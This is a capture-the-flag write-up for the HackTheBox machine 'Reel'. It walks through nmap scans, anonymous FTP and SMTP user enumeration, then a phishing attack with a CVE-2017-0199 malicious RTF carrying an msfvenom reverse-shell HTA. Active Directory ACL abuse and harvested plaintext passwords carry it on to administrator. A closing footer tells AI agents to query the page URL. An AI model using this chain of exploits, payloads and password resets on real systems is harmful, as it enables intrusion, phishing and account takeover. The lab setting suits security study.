# Reel
## Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.77 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Mon Sep 12 22:07:39 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
# Nmap done at Mon Sep 12 22:08:06 2022 -- 1 IP address (1 host up) scanned in 26.56 seconds
```
{% endcode %}
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
{% code overflow="wrap" %}
```bash
# Nmap 7.92 scan initiated Mon Sep 12 22:10:40 2022 as: nmap -sCV -p21,22,25 -oN targeted 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.92%I=7%D=9/12%Time=631F924A%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 12 22:13:32 2022 -- 1 IP address (1 host up) scanned in 171.82 seconds
```
{% endcode %}
`Anonymous` login is enabled in the *FTP* server.
> ftp 10.10.10.77
```
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
```
Inside the *FTP* server there is one directory called `documents` with some files.
> ftp> ls documents
```
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
```
Let's transfer all of them to our current machine.
> ftp> get AppLocker.docx
>
> ftp> get readme.txt
>
> ftp> get Windows\ Event\ Forwarding.docx
The `readme.txt` file says that someone is checking for any `.rtf` files in his email.
> cat readme.txt
```
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
```
The `AppLocker.txt` has some instructions for *AppLocker* procedure.
> docx2txt AppLocker.docx; cat AppLocker.txt
{% code overflow="wrap" %}
```
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
```
{% endcode %}
The `Windows Event Forwarding.docx` seems to be corrupted, so we can not see it's content.
> docx2txt Windows\ Event\ Forwarding.docx
```
Failed to extract required information from !
```
But, we can see an email in the metadata.
> exiftool Windows\ Event\ Forwarding.docx
```
ExifTool Version Number : 12.44
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 22:13:23+01:00
File Access Date/Time : 2022:09:13 00:41:48+02:00
File Inode Change Date/Time : 2022:09:13 00:41:48+02:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
```
As por *25 (SMTP)* is open, we can check with the *smtp-user-enum* toot, if the email `nico@megabank.com` is valid.
> smtp-user-enum -m RCPT -u 10.10.10.77 25
* `-m` **mode** to enumerate *SMTP* users.
* `-u` **username** to test.
```
Connecting to 10.10.10.77 25 ...
220 Mail Service ready
250 Hello.
250 OK
Start enumerating users with RCPT mode ...
[SUCC] nico@megabank.com 250 OK
```
## Exploitation
As The email is valid, the idea is to generate a malicious `.rtf` file, and then send it to the `nico@megabank.com` email address. There is one python [script](https://github.com/bhdresh/CVE-2017-0199) which allow us to create malicious `.rtf` files. First, we'll have to generate a malicious `.hta` file with *msfvenom*, which will send us a reverse shell.
> msfvenom -p windows/shell\_reverse\_tcp LHOST=10.10.14.11 LPORT=4444 -f hta-psh -o malicious.hta
* `-p` indicates the type of **payload**.
* `LHOST` local **host** IP.
* `LPORT` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.
On the current directory, we'll have to set a simple HTTP server, so the victim machine can download the `malicious.hta` file.
> python -m http.server 80
Now, set a *netcat* listener on port *4444* with *rlwrap*.
> rlwrap nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
Finally, we can execute the script with *Python2*, and generate the `malicious.rtf` file.
> python2 41894.py -M gen -w malicious.rtf -u
* `-M` generate **malicious file** only.
* `-w` **name** of the malicious RTF file.
* `-u` path to the **HTA** **file**.
```
Generating normal RTF payload.
Generated malicious.rtf successfully
```
Finally, if send the malicious file to `nico@megabank.com`.we should be able to get a shell as `nico`, and we'll be able to grab the user flag.
> sendemail -f -t -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf
* `-f` **sender** email address.
* `-t` **receiver** email address.
* `-s` SMTP **server**.
* `-m` **message** to send.
* `-a` **file** attachment.
```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.77] 62436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
htb\nico
type \users\nico\desktop\user.txt
fa363aebcfa2c29897a69af385fee971
```
## Privilege Escalation
In the desktop of the user `nico`, there is a file called `cred.xml` with some encoded password for the `tom` user.
> type \users\nico\desktop\cred.xml
```
System.Management.Automation.PSCredentialSystem.ObjectSystem.Management.Automation.PSCredentialHTB\Tom01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692
```
We'll have to user *PowerShell* to decode the password.
> powershell (Import-CliXml -Path \users\nico\desktop\cred.xml).GetNetworkCredential().password
```
1ts-mag1c!!!
```
Now we can log in as `tom` via *SSH*.
> sshpass -p '1ts-mag1c!!!' ssh tom\@10.10.10.77
{% code overflow="wrap" %}
```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
```
{% endcode %}
In the desktop of the `tom` user there is a directory called `AD Audit`.
> dir \Users\tom\Desktop
{% code overflow="wrap" %}
```
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop
05/29/2018 08:57 PM .
05/29/2018 08:57 PM ..
05/29/2018 09:02 PM AD Audit
0 File(s) 0 bytes
3 Dir(s) 15,771,508,736 bytes free
```
{% endcode %}
There are a few things inside `AD Audit`.
> dir "\Users\tom\Desktop\AD Audit"
{% code overflow="wrap" %}
```
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 09:02 PM .
05/29/2018 09:02 PM ..
05/30/2018 12:44 AM BloodHound
05/29/2018 09:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,771,508,736 bytes free
```
{% endcode %}
The `note.txt` file says that there is no way to gain admin privileges.
> type "\Users\tom\Desktop\AD Audit\note.txt"
Inside the `BloodHound` directory we can see the `PowerView.ps1` script.
> dir "\Users\tom\Desktop\AD Audit\BloodHound"
{% code overflow="wrap" %}
```
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/30/2018 12:44 AM .
05/30/2018 12:44 AM ..
05/29/2018 08:57 PM Ingestors
10/30/2017 11:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,771,508,736 bytes free
```
{% endcode %}
And inside the Ingestors directory there are some files and binaries.
> dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"
{% code overflow="wrap" %}
```
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018 08:57 PM .
05/29/2018 08:57 PM ..
11/17/2017 12:50 AM 112,225 acls.csv
10/28/2017 09:50 PM 3,549 BloodHound.bin
10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 04:27 PM 568,832 SharpHound.exe
10/24/2017 04:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,771,508,736 bytes free
```
{% endcode %}
There is one called `acls.csv`. Let's transfer it to our local machine. Set an SMB server with *impacket*.
> impacket-smbserver smbFolder $(pwd) -smb2support
Then, copy the `acls.csv` file to the `smbFolder` share.
> copy acls.csv \\\10.10.14.11\smbFolder\\
We can see that the file has a lot of information about objects, principals, rights and access control type.
> csvtool readable acls.csv
```
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
Domain Computers@HTB.LOCAL GROUP Domain Admins@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Account Operators@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Local System@HTB.LOCAL USER GenericAll AccessAllowed False
...
```
If we *grep* for `tom`, we'll see that it has *WriteOwner* rights on the `claire` user.
> csvtool readable acls.csv | grep tom
```
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed False
```
This means that `tom` can change the password of the `claire` user. We'll need to use `PowerView.ps1` to do it. First, open a *PowerShell* shell.
> powershell
Then, import the `PowerView.ps1` module located in the `BloodHound` directory.
> Import-Module .\PowerView\.ps1
Set `tom` as the owner of `claire` ACL.
> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
Give the right permissions to change `claire` passsword.
> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Create a credential `$cred` with the password `alfa8sa123$!`.
> $cred = ConvertTo-SecureString "alfa8sa123$!" -AsPlainText -force
Finally, change `claire` password to the credential we just made.
> Set-DomainUserPassword -identity claire -accountpassword $cred
Now, we can log in as `claire` via SSH.
> sshpass -p 'alfa8sa123$!' ssh claire\@10.10.10.77
{% code overflow="wrap" %}
```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>whoami
htb\claire
```
{% endcode %}
If we grep for `claire` in the `acls.csv` file, we'll see that she has *WriteDacl* rights on the `Backup_Admins` group.
> csvtool readable acls.csv | grep claire
```
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed False
```
Which means that I can add the user `claire` to the `Backup_Admins` group.
> net group Backup\_Admins claire /add
```
The command completed successfully.
```
In order to get the right permissions, you might need to log out, and then log in again. Now, the user `claire` is in the `Backup_Admins` group.
> net group Backup\_Admins
{% code overflow="wrap" %}
```
Group name Backup_Admins
Comment
Members
-------------------------------------------------------------------------------
claire ranj
The command completed successfully.
```
{% endcode %}
We can see that the `Backup_Admins` group have full rights on the `\users\administrator` directory.
> icacls \Users\Administrator
{% code overflow="wrap" %}
```
\Users\Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
```
{% endcode %}
But, we can't see the flag yet.
> type \Users\Administrator\Desktop\root.txt
```
Access is denied.
```
There is a directory called `Backup Scripts` in the administrator desktop, which has some files.
> dir \Users\Administrator\Desktop
{% code overflow="wrap" %}
```
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 10:47 PM .
11/02/2017 10:47 PM ..
11/04/2017 12:22 AM 845 backup.ps1
11/02/2017 10:37 PM 462 backup1.ps1
11/04/2017 12:21 AM 5,642 BackupScript.ps1
11/02/2017 10:43 PM 2,791 BackupScript.zip
11/04/2017 12:22 AM 1,855 folders-system-state.txt
11/04/2017 12:22 AM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 15,771,508,736 bytes free
```
{% endcode %}
If we search the the word Password in all the files, we'll find the password for the `administrator` user.
> powershell "dir | Select-String 'Password'"
{% code overflow="wrap" %}
```
BackupScript.ps1:1:# admin password
BackupScript.ps1:2:$password="Cr4ckMeIfYouC4n!"
```
{% endcode %}
Finally, if we log in via *SSH* as the `administrator` user, all we have to do is reap the harvest and take the root flag.
> sshpass -p 'Cr4ckMeIfYouC4n!' ssh administrator\@10.10.10.77
{% code overflow="wrap" %}
```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
administrator@REEL C:\Users\Administrator>whoami
htb\administrator
administrator@REEL C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
1018a0331e686176ff4577c728eaf32a
```
{% endcode %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/reel.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.